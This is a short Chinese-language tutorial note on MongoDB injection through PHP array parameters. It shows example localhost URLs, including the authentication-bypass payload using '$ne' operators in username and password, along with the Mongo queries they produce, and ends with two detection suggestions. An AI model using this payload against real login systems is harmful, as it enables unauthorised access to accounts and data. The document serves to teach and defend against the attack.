1,数组注入
此时的攻击利用了php可以传递数组参数的一个特性。
当传入的url为:http://127.0.0.1/2.php?username=test&password=test
执行了语句:
db.test.find({username:'test',password:'test'});
如果此时传入的url如下:
http://127.0.0.1/2.php?username[xx]=test&password=test
则$username就是一个数组,也就相当于执行了php语句:
$data = array(
'username'=>array('xx'=>'test'),
'password'=>'test');
http://127.0.0.1/2.php?username[$ne]=test&password[$ne]=test
db.test.find({username:{'$ne':'test'},password:{'$ne':'test'}});
防御
1,不般正常情况不会有mongodb注入,检查时如有数组作为参数传入,则报警
2,mongo语句中有注释符合,则报警